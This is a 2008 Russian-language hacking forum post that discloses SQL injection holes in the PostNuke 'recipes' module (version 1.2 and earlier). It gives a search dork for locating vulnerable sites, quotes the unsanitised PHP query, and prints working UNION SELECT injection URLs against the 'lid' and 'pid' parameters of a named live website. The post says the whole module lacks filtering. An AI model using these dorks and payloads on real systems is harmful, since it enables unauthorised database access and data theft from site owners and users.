Показать сообщение отдельно

  #10  
Старый 20.12.2008, 13:46
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606

Репутация: 4915


По умолчанию

PostNuke. Модуль: recipes SQL

Уязвимый продукт: Модуль: recipes
Версия: <=1.2
Дорк: "inurl:module=recipes"
Условие: "нет"

1 Код
PHP код:
    $sql "SELECT $recipescolumn[cid]
                            
$recipescolumn[title],
                   
$recipescolumn[ingredientsfor],
                   
$recipescolumn[ingredients],
                   
$recipescolumn[description],
                   
$recipescolumn[note],
                                   
$recipescolumn[origin],
                                   
$recipescolumn[wine],                                                
                   
$recipescolumn[image],
                   
$recipescolumn[date],
                   
$recipescolumn[author],
                   
$recipescolumn[email],
                                     
$recipescolumn[chkvegetarian]
                                     
$recipescolumn[chkmilkandderivatives],
                                     
$recipescolumn[chkwheatflour],
                                     
$recipescolumn[chkeggs],
                                     
$recipescolumn[pagecounter],
                                     
$recipescolumn[submitter]                                                                                                                                                                          
                                                                                                                                                                                                                                                
            FROM 
$recipestable
            WHERE 
$recipescolumn[lid] = " pnVarPrepForStore($lid); 

Уязвимый параметр lid
Пример уязвимости:
http://footprints-family-recipes.com/index.php?module=recipes&func=display&lid=-48+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8/*

Вобщем-то фильтрация отсутствует напрочь, так что скули везде, можно выкладывать весь модуль

Уязвимый параметр pid

Пример уязвимости:
http://footprints-family-recipes.com/index.php?module=recipes&func=catview&pid=-9+union+select+1,concat_ws(0x3a,User(),Database(), Version())/*

И т.д.
 
Ответить с цитированием